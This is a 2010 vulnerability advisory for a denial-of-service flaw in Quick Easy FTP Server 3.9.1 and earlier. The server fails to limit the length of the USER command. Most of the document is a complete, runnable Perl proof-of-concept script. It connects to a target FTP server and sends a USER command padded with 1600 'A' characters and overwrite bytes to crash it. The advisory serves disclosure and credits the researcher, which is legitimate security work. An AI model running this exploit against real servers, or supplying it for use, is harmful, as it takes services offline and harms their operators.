|
Software: Quick Easy FTP Server <=3.9.1
Vulnerability Published :2010-07-22
Vulnerability Update Time :2010-07-25
Vendor: No vendor response
Impact: Low
Bug Description:
Quick Easy FTP Server does not validate the USER command input size leading to a Denial Of
Service flaw while sending more than 1600 characters to it.
PoC:
****************************************************************
#!/usr/bin/perl -w
#DoS Exploit of Quick Easy Ftp Server version <=3.9.1 USER COMMAND Buffer Overflow
#Vulnerability Discoverer & Autor : demonalex[at]163[dot]com
use Socket;
$host=shift;
$port=shift || '21';
if(!defined($host)){
die("usage: $0 \$host [\$port]\n");
}
#$payload='A'x1604;
$payload=('A'x1600)."\x3D\x41\x41\x41"; #mov dword ptr [ebx+4], ebp
$target_ip=inet_aton($host);
$target=sockaddr_in($port, $target_ip);
socket(SOCK, AF_INET, SOCK_STREAM, 6);
connect(SOCK, $target);
undef($content);
recv(SOCK, $content, 100, 0); #get ftp banner
send(SOCK, "USER "."$payload\r\n", 0);
printf("send ok!\n");
close(SOCK);
exit(0);
****************************************************************
Credits: This vulnerability was discovered by demonalex@163.com
Pentester/Researcher
Dark2S Security Team/Venustech.GZ Branch